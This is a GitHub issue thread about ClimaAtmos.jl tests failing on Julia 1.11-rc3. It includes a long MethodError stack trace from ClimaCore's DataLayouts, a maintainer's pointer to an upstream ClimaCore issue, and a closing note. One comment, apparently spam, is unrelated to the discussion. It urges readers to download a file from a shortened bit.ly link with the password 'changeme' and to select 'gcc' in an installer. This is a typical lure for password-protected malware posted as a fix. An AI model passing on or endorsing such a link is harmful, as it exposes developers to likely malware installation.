### ISSUE TITLE
ClimaAtmos tests fail on julia 1.11-rc3

### ISSUE THREAD

**Issue by Sbozzolo** [CliMA/ClimaAtmos.jl#3268]
Error (seen in recent CI builds) 
```
make horizontal spaces: Error During Test at /home/runner/work/ClimaAtmos.jl/ClimaAtmos.jl/test/utilities.jl:201
  Got exception outside of a @test
  MethodError: no method matching getindex(::ClimaCore.DataLayouts.IF{Float32, 6, SubArray{Float32, 2, Array{Float32, 3}, Tuple{Base.Slice{Base.OneTo{Int64}}, Base.Slice{Base.OneTo{Int64}}, Int64}, true}}, ::Int64)
  The function `getindex` exists, but no method is defined for this combination of argument types.
  
  Closest candidates are:
    getindex(::Union{ClimaCore.DataLayouts.IF, ClimaCore.DataLayouts.IFH, ClimaCore.DataLayouts.IJF, ClimaCore.DataLayouts.IJFH, ClimaCore.DataLayouts.VF, ClimaCore.DataLayouts.VIFH, ClimaCore.DataLayouts.VIJFH}, !Matched::CartesianIndex)
     @ ClimaCore ~/.julia/packages/ClimaCore/Zoz8z/src/DataLayouts/DataLayouts.jl:[11](https://github.com/CliMA/ClimaAtmos.jl/actions/runs/10572019872/job/29289068847#step:7:12)69
  
  Stacktrace:
    [1] _broadcast_getindex
      @ ./broadcast.jl:626 [inlined]
    [2] _getindex
      @ ./broadcast.jl:670 [inlined]
    [3] _getindex
      @ ./broadcast.jl:669 [inlined]
    [4] _broadcast_getindex
      @ ./broadcast.jl:645 [inlined]
    [5] getindex
      @ ./broadcast.jl:605 [inlined]
    [6] copyto!(dest::ClimaCore.DataLayouts.IF{Float32, 6, SubArray{Float32, 2, Array{Float32, 3}, Tuple{Base.Slice{Base.OneTo{Int64}}, Base.Slice{Base.OneTo{Int64}}, Int64}, true}}, bc::Base.Broadcast.Broadcasted{ClimaCore.DataLayouts.IFStyle{6, Array{Float32}}, Tuple{StaticArrays.SOneTo{6}}, typeof(/), Tuple{Float32, ClimaCore.DataLayouts.IF{Float32, 6, SubArray{Float32, 2, Array{Float32, 3}, Tuple{Base.Slice{Base.OneTo{Int64}}, Base.Slice{Base.OneTo{Int64}}, Int64}, true}}}}, ::ClimaCore.DataLayouts.ToCPU)
      @ ClimaCore.DataLayouts ~/.julia/packages/ClimaCore/Zoz8z/src/DataLayouts/copyto.jl:107
    [7] copyto!(dest::ClimaCore.DataLayouts.IF{Float32, 6, SubArray{Float32, 2, Array{Float32, 3}, Tuple{Base.Slice{Base.OneTo{Int64}}, Base.Slice{Base.OneTo{Int64}}, Int64}, true}}, bc::Base.Broadcast.Broadcasted{ClimaCore.DataLayouts.IFStyle{6, Array{Float32}}, Tuple{StaticArrays.SOneTo{6}}, typeof(/), Tuple{Float32, ClimaCore.DataLayouts.IF{Float32, 6, SubArray{Float32, 2, Array{Float32, 3}, Tuple{Base.Slice{Base.OneTo{Int64}}, Base.Slice{Base.OneTo{Int64}}, Int64}, true}}}})
      @ ClimaCore.DataLayouts ~/.julia/packages/ClimaCore/Zoz8z/src/DataLayouts/copyto.jl:5
    [8] copyto!(dest::ClimaCore.DataLayouts.IFH{Float32, 6, 10, Array{Float32, 3}}, bc::Base.Broadcast.Broadcasted{ClimaCore.DataLayouts.IFHStyle{6, 10, Array{Float32}}, NTuple{5, Base.OneTo{Int64}}, typeof(/), Tuple{Float32, ClimaCore.DataLayouts.IFH{Float32, 6, 10, Array{Float32, 3}}}}, ::ClimaCore.DataLayouts.ToCPU)
      @ ClimaCore.DataLayouts ~/.julia/packages/ClimaCore/Zoz8z/src/DataLayouts/copyto.jl:69
    [9] copyto!(dest::ClimaCore.DataLayouts.IFH{Float32, 6, 10, Array{Float32, 3}}, bc::Base.Broadcast.Broadcasted{ClimaCore.DataLayouts.IFHStyle{6, 10, Array{Float32}}, NTuple{5, Base.OneTo{Int64}}, typeof(/), Tuple{Float32, ClimaCore.DataLayouts.IFH{Float32, 6, 10, Array{Float32, 3}}}})
      @ ClimaCore.DataLayouts ~/.julia/packages/ClimaCore/Zoz8z/src/DataLayouts/copyto.jl:5
   [10] copy
      @ ./broadcast.jl:892 [inlined]
   [11] materialize
      @ ./broadcast.jl:867 [inlined]
   [[12](https://github.com/CliMA/ClimaAtmos.jl/actions/runs/10572019872/job/29289068847#step:7:13)] _SpectralElementGrid1D(topology::ClimaCore.Topologies.IntervalTopology{ClimaComms.SingletonCommsContext{ClimaComms.CPUSingleThreaded}, ClimaCore.Meshes.IntervalMesh{ClimaCore.Domains.IntervalDomain{ClimaCore.Geometry.XPoint{Float32}, Nothing}, LinRange{ClimaCore.Geometry.XPoint{Float32}, Int64}}, @NamedTuple{}}, quadrature_style::ClimaCore.Quadratures.GLL{6}, ::Val{10})
      @ ClimaCore.Grids ~/.julia/packages/ClimaCore/Zoz8z/src/Grids/spectralelement.jl:98
   [[13](https://github.com/CliMA/ClimaAtmos.jl/actions/runs/10572019872/job/29289068847#step:7:14)] _SpectralElementGrid1D(topology::ClimaCore.Topologies.IntervalTopology{ClimaComms.SingletonCommsContext{ClimaComms.CPUSingleThreaded}, ClimaCore.Meshes.IntervalMesh{ClimaCore.Domains.IntervalDomain{ClimaCore.Geometry.XPoint{Float32}, Nothing}, LinRange{ClimaCore.Geometry.XPoint{Float32}, Int64}}, @NamedTuple{}}, quadrature_style::ClimaCore.Quadratures.GLL{6})
      @ ClimaCore.Grids ~/.julia/packages/ClimaCore/Zoz8z/src/Grids/spectralelement.jl:42
   [[14](https://github.com/CliMA/ClimaAtmos.jl/actions/runs/10572019872/job/29289068847#step:7:15)] #4
      @ ~/.julia/packages/ClimaCore/Zoz8z/src/Grids/spectralelement.jl:38 [inlined]
   [[15](https://github.com/CliMA/ClimaAtmos.jl/actions/runs/10572019872/job/29289068847#step:7:16)] get!(default::ClimaCore.Grids.var"#4#5"{ClimaCore.Topologies.IntervalTopology{ClimaComms.SingletonCommsContext{ClimaComms.CPUSingleThreaded}, ClimaCore.Meshes.IntervalMesh{ClimaCore.Domains.IntervalDomain{ClimaCore.Geometry.XPoint{Float32}, Nothing}, LinRange{ClimaCore.Geometry.XPoint{Float32}, Int64}}, @NamedTuple{}}, ClimaCore.Quadratures.GLL{6}}, h::Dict{Any, Any}, key::Tuple{UnionAll, ClimaCore.Topologies.IntervalTopology{ClimaComms.SingletonCommsContext{ClimaComms.CPUSingleThreaded}, ClimaCore.Meshes.IntervalMesh{ClimaCore.Domains.IntervalDomain{ClimaCore.Geometry.XPoint{Float32}, Nothing}, LinRange{ClimaCore.Geometry.XPoint{Float32}, Int64}}, @NamedTuple{}}, ClimaCore.Quadratures.GLL{6}})
      @ Base ./dict.jl:458
   [[16](https://github.com/CliMA/ClimaAtmos.jl/actions/runs/10572019872/job/29289068847#step:7:17)] SpectralElementGrid1D
      @ ~/.julia/packages/ClimaCore/Zoz8z/src/Grids/spectralelement.jl:34 [inlined]
   [17] ClimaCore.Spaces.SpectralElementSpace1D(topology::ClimaCore.Topologies.IntervalTopology{ClimaComms.SingletonCommsContext{ClimaComms.CPUSingleThreaded}, ClimaCore.Meshes.IntervalMesh{ClimaCore.Domains.IntervalDomain{ClimaCore.Geometry.XPoint{Float32}, Nothing}, LinRange{ClimaCore.Geometry.XPoint{Float32}, Int64}}, @NamedTuple{}}, quadrature_style::ClimaCore.Quadratures.GLL{6})
      @ ClimaCore.Spaces ~/.julia/packages/ClimaCore/Zoz8z/src/Spaces/spectralelement.jl:68
   [18] make_horizontal_space(mesh::ClimaCore.Meshes.IntervalMesh{ClimaCore.Domains.IntervalDomain{ClimaCore.Geometry.XPoint{Float32}, Nothing}, LinRange{ClimaCore.Geometry.XPoint{Float32}, Int64}}, quad::ClimaCore.Quadratures.GLL{6}, comms_ctx::ClimaComms.SingletonCommsContext{ClimaComms.CPUSingleThreaded}, bubble::Bool)
      @ ClimaAtmos ~/work/ClimaAtmos.jl/ClimaAtmos.jl/src/utils/common_spaces.jl:43
   [19] macro expansion
      @ ~/work/ClimaAtmos.jl/ClimaAtmos.jl/test/utilities.jl:210 [inlined]
   [20] macro expansion
      @ /opt/hostedtoolcache/julia/1.11.0-rc3/x64/share/julia/stdlib/v1.11/Test/src/Test.jl:[17](https://github.com/CliMA/ClimaAtmos.jl/actions/runs/10572019872/job/29289068847#step:7:18)00 [inlined]
   [21] top-level scope
      @ ~/work/ClimaAtmos.jl/ClimaAtmos.jl/test/utilities.jl:203
   [22] include(mod::Module, _path::String)
      @ Base ./Base.jl:557
   [23] include
      @ ~/.julia/packages/SafeTestsets/raUNr/src/SafeTestsets.jl:28 [inlined]
   [24] macro expansion
      @ ./timing.jl:578 [inlined]
   [25] macro expansion
      @ ~/work/ClimaAtmos.jl/ClimaAtmos.jl/test/runtests.jl:13 [inlined]
   [26] macro expansion
      @ /opt/hostedtoolcache/julia/1.11.0-rc3/x64/share/julia/stdlib/v1.11/Test/src/Test.jl:1700 [inlined]
   [27] macro expansion
      @ ~/work/ClimaAtmos.jl/ClimaAtmos.jl/test/runtests.jl:13 [inlined]
   [28] top-level scope
      @ ~/.julia/packages/SafeTestsets/raUNr/src/SafeTestsets.jl:30
   [29] eval(m::Module, e::Any)
      @ Core ./boot.jl:430
   [30] top-level scope
      @ ~/work/ClimaAtmos.jl/ClimaAtmos.jl/test/runtests.jl:28
   [31] include(mod::Module, _path::String)
      @ Base ./Base.jl:557
   [32] exec_options(opts::Base.JLOptions)
      @ Base ./client.jl:3[18](https://github.com/CliMA/ClimaAtmos.jl/actions/runs/10572019872/job/29289068847#step:7:19)
   [33] _start()
      @ Base ./client.jl:526
┌ Info: z heights
│   z_mesh.faces =
│    11-element LinRange{ClimaCore.Geometry.ZPoint{Float32}, Int64}:
└     ZPoint(0.0), ZPoint(0.314159), …, ZPoint(2.82743), ZPoint(3.14159)
 77.618316 seconds (693.58 M allocations: 32.729 GiB, 18.24% gc time, 99.[23](https://github.com/CliMA/ClimaAtmos.jl/actions/runs/10572019872/job/29289068847#step:7:24)% compilation time: <1% of which was recompilation)
```

**Comment by charleskawczynski** [comment]
This is due to https://github.com/CliMA/ClimaCore.jl/issues/1923

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by charleskawczynski** [comment]
Closed by #3357.
